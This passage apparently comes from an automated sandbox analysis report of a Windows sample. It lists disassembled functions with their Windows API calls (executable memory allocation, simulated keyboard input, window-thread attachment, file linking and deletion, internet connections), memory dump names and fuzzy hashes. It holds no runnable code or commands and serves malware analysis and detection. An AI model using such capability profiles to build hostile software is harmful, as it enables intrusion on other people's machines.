                                                                                                                              • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,001C6AA6), ref: 0017AB2D
                                                                                                                              • _wcscmp.LIBCMT ref: 0017AB49
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharUpper_wcscmp
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 820872866-0
                                                                                                                              • Opcode ID: b4348f27793f92a6d401134d7772359d91305475e8952aff5ce80caea9d506b1
                                                                                                                              • Instruction ID: 489edb44472f102b04cad050431f11e8afeb92ab481c1a331d786d22aa3aa1a1
                                                                                                                              • Opcode Fuzzy Hash: b4348f27793f92a6d401134d7772359d91305475e8952aff5ce80caea9d506b1
                                                                                                                              • Instruction Fuzzy Hash: CCA10571B00106EBDB19DF65E9856BDB7B1FF84300FA58169EC5AC3290DB319871C782
                                                                                                                              Function 001D0D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 001D0D85
                                                                                                                              • CharLowerBuffW.USER32(?,?), ref: 001D0DC8
                                                                                                                                • Part of subcall function 001D0458: CharLowerBuffW.USER32(?,?,?,?), ref: 001D0478
                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 001D0FB2
                                                                                                                              • _memmove.LIBCMT ref: 001D0FC2
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3659485706-0
                                                                                                                              • Opcode ID: ece211aa21c74882f169e460d25f6e0cb1c2f0af71628af2ca133b41d495e071
                                                                                                                              • Instruction ID: ee9acce06903daa6c93fa831796a745816e4f629d530eee168e240339f48abec
                                                                                                                              • Opcode Fuzzy Hash: ece211aa21c74882f169e460d25f6e0cb1c2f0af71628af2ca133b41d495e071
                                                                                                                              • Instruction Fuzzy Hash: C8B18F716043009FC705DF28C480A6AB7F5EF99714F14896EF8899B352DB71EE46CB92
                                                                                                                              Function 001CAF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 001CAF56
                                                                                                                              • CoUninitialize.COMBASE ref: 001CAF61
                                                                                                                                • Part of subcall function 001B1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 001B10B8
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 001CAF6C
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 001CB23F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 780911581-0
                                                                                                                              • Opcode ID: 0f9ac94c77e1329dffd474ff66cfdacfc6fb6acd334838f66bc4a78961b89795
                                                                                                                              • Instruction ID: 459aa00899442a4ad5b9cfc53d0206aaf23a012624794d6addae710ec3a31be2
                                                                                                                              • Opcode Fuzzy Hash: 0f9ac94c77e1329dffd474ff66cfdacfc6fb6acd334838f66bc4a78961b89795
                                                                                                                              • Instruction Fuzzy Hash: 6FA11575604601AFCB10DF14C896F6AB7E4BFA8360F05845DF99A9B3A1CB70ED40CB82
                                                                                                                              Function 0017C320 Relevance: 6.3, APIs: 4, Instructions: 259fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memmove.LIBCMT ref: 0017C419
                                                                                                                              • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,?,00000000,?,001B6653,?,?,00000000), ref: 0017C495
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: FileRead_memmove
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1325644223-0
                                                                                                                              • Opcode ID: 98303a31ef4dc99061717077b7c7f3a828518ad0c24989c22a41981c0178ef61
                                                                                                                              • Instruction ID: 209b3595941810f62e620751c93d2f48982ea6105848c4f4df99e4020dd19074
                                                                                                                              • Opcode Fuzzy Hash: 98303a31ef4dc99061717077b7c7f3a828518ad0c24989c22a41981c0178ef61
                                                                                                                              • Instruction Fuzzy Hash: BAA1CE30A04609EBDB14CF65D894BBDFBB0FF05300F14C199E86A9B285D735E961DB91
                                                                                                                              Function 001942EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3877424927-0
                                                                                                                              • Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                              • Instruction ID: b746b136fe2457f92edf2387c35b73f4b6868d4782dd61782e6db5a4c1d61e81
                                                                                                                              • Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
                                                                                                                              • Instruction Fuzzy Hash: 3851AE30A00316EBDF288FB98880AAE77B5BF50324F248729F865972D0D7709E529B40
                                                                                                                              Function 001DC2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 001DC354
                                                                                                                              • ScreenToClient.USER32(?,00000002), ref: 001DC384
                                                                                                                              • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 001DC3EA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3880355969-0
                                                                                                                              • Opcode ID: d81f997599f44a86184c9735468904f0d4c7aaab8b72012ec9af62b72fdf72b9
                                                                                                                              • Instruction ID: cc7d8a2dd3614ea9b0193af79adaaec37e5a6213e7cba3a195ed71fc06128f08
                                                                                                                              • Opcode Fuzzy Hash: d81f997599f44a86184c9735468904f0d4c7aaab8b72012ec9af62b72fdf72b9
                                                                                                                              • Instruction Fuzzy Hash: 2F514C71A00206EFDF10DF68D884AAE7BB6BB55360F20895AF9159B291D770ED41CB90
                                                                                                                              Function 001AD206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 001AD258
                                                                                                                              • __itow.LIBCMT ref: 001AD292
                                                                                                                                • Part of subcall function 001AD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 001AD549
                                                                                                                              • SendMessageW.USER32(?,0000110A,00000001,?), ref: 001AD2FB
                                                                                                                              • __itow.LIBCMT ref: 001AD350
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$__itow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3379773720-0
                                                                                                                              • Opcode ID: d138f2f6074f04fe6809944a6c3832969ef94793855d3c3234e19f68746d188d
                                                                                                                              • Instruction ID: 715e481343ba77c8a616a0bc5c9886e3d800745bed898ed3b517e0835d5a4f33
                                                                                                                              • Opcode Fuzzy Hash: d138f2f6074f04fe6809944a6c3832969ef94793855d3c3234e19f68746d188d
                                                                                                                              • Instruction Fuzzy Hash: A541C875A00709AFDF15DF94DC42FEE7BB9AF59710F004029FA06A7281DB709A45CB62
                                                                                                                              Function 001BEE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 001BEF32
                                                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 001BEF58
                                                                                                                              • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 001BEF7D
                                                                                                                              • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 001BEFA9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3321077145-0
                                                                                                                              • Opcode ID: ba8508d981fda5a5069f99a619cdc77599d16c00e06dcdb31fe8c44db36373c6
                                                                                                                              • Instruction ID: d6f0b71a47843e71ce866277e562240f9e0d5d7df791905ea90d2071daf42798
                                                                                                                              • Opcode Fuzzy Hash: ba8508d981fda5a5069f99a619cdc77599d16c00e06dcdb31fe8c44db36373c6
                                                                                                                              • Instruction Fuzzy Hash: 4B414C39600611DFCB11EF15C548A99BBF5EF99320B19C098E84AAF762CB70FD40DB91
                                                                                                                              Function 001DB354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001DB3E1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InvalidateRect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 634782764-0
                                                                                                                              • Opcode ID: b53e6a738da46848452b9a777e4cf99b10d65eded4588490d98fe74d607b04c1
                                                                                                                              • Instruction ID: 6198ad33cf680c13aade5725585d036f9c4ba0ddca3821a0ff726a6ec0170650
                                                                                                                              • Opcode Fuzzy Hash: b53e6a738da46848452b9a777e4cf99b10d65eded4588490d98fe74d607b04c1
                                                                                                                              • Instruction Fuzzy Hash: 6F317A34608204FBEF24DE5898D9BAC37A5AB05360F668513FA53D67A2C730E950EB61
                                                                                                                              Function 001DD5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • ClientToScreen.USER32(?,?), ref: 001DD617
                                                                                                                              • GetWindowRect.USER32(?,?), ref: 001DD68D
                                                                                                                              • PtInRect.USER32(?,?,001DEB2C), ref: 001DD69D
                                                                                                                              • MessageBeep.USER32(00000000), ref: 001DD70E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1352109105-0
                                                                                                                              • Opcode ID: a94b9202cf209d2b07921a564f240cc8dd4b4224c2015e89985a9edd10cb9699
                                                                                                                              • Instruction ID: 2f82ec248d942800fb106e45e2725c5cf21469dc3f47fc8db78911147082a74f
                                                                                                                              • Opcode Fuzzy Hash: a94b9202cf209d2b07921a564f240cc8dd4b4224c2015e89985a9edd10cb9699
                                                                                                                              • Instruction Fuzzy Hash: E8416934A00118DFDB11CF68F884BA97BF6BF49314F1981AAE4199B3A5D730E881CB90
                                                                                                                              Function 001B4497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 001B44EE
                                                                                                                              • SetKeyboardState.USER32(00000080,?,00008000), ref: 001B450A
                                                                                                                              • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 001B456A
                                                                                                                              • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 001B45C8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: KeyboardState$InputMessagePostSend
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 432972143-0
                                                                                                                              • Opcode ID: 955b5a36e455672335eb32a05d67dfbcc111e667608c3980e146294a6dab6353
                                                                                                                              • Instruction ID: 84f21775316f90ac8982c6554a5d164299a8fea0fedbf4f1db8caf0340a13f30
                                                                                                                              • Opcode Fuzzy Hash: 955b5a36e455672335eb32a05d67dfbcc111e667608c3980e146294a6dab6353
                                                                                                                              • Instruction Fuzzy Hash: EB315AB19046586FEF348B64D8087FE7BB59B55310F04821AF0C2932D3C7748E85D762
                                                                                                                              Function 001A4DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 001A4DE8
                                                                                                                              • __isleadbyte_l.LIBCMT ref: 001A4E16
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 001A4E44
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 001A4E7A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3058430110-0
                                                                                                                              • Opcode ID: cfea15f922666c8430c4bf1106abcc88f2fc93fbd44f98dcc121b06eae26d653
                                                                                                                              • Instruction ID: aa189e2fd06fdbdbaefc5785c3b4b7834a54d9513675ced0c279691464694eaf
                                                                                                                              • Opcode Fuzzy Hash: cfea15f922666c8430c4bf1106abcc88f2fc93fbd44f98dcc121b06eae26d653
                                                                                                                              • Instruction Fuzzy Hash: 5331B339600256AFDF21DF74CC45BBA7BA6FF82310F154528E861871A1E7B4DC91DB90
                                                                                                                              Function 001D7AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetForegroundWindow.USER32 ref: 001D7AB6
                                                                                                                                • Part of subcall function 001B69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 001B69E3
                                                                                                                                • Part of subcall function 001B69C9: GetCurrentThreadId.KERNEL32 ref: 001B69EA
                                                                                                                                • Part of subcall function 001B69C9: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 001B69F1
                                                                                                                              • GetCaretPos.USER32(?), ref: 001D7AC7
                                                                                                                              • ClientToScreen.USER32(00000000,?), ref: 001D7B00
                                                                                                                              • GetForegroundWindow.USER32 ref: 001D7B06
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2759813231-0
                                                                                                                              • Opcode ID: 772ca83ecaba4caeb2b5693d182e76889597c6a49e3f3c060edb2a7d3ace3931
                                                                                                                              • Instruction ID: 9376bc46a2719b48b288e0e4ab1efed5196c5ff99a818a6e18dfba661580a2af
                                                                                                                              • Opcode Fuzzy Hash: 772ca83ecaba4caeb2b5693d182e76889597c6a49e3f3c060edb2a7d3ace3931
                                                                                                                              • Instruction Fuzzy Hash: 0D31EF71D00108AFCB01EFB5D8859EFBBF9EF68314B10806AE915E7211E7359E05CBA0
                                                                                                                              Function 001C497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001C49B7
                                                                                                                                • Part of subcall function 001C4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 001C4A60
                                                                                                                                • Part of subcall function 001C4A41: InternetCloseHandle.WININET(00000000), ref: 001C4AFD
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
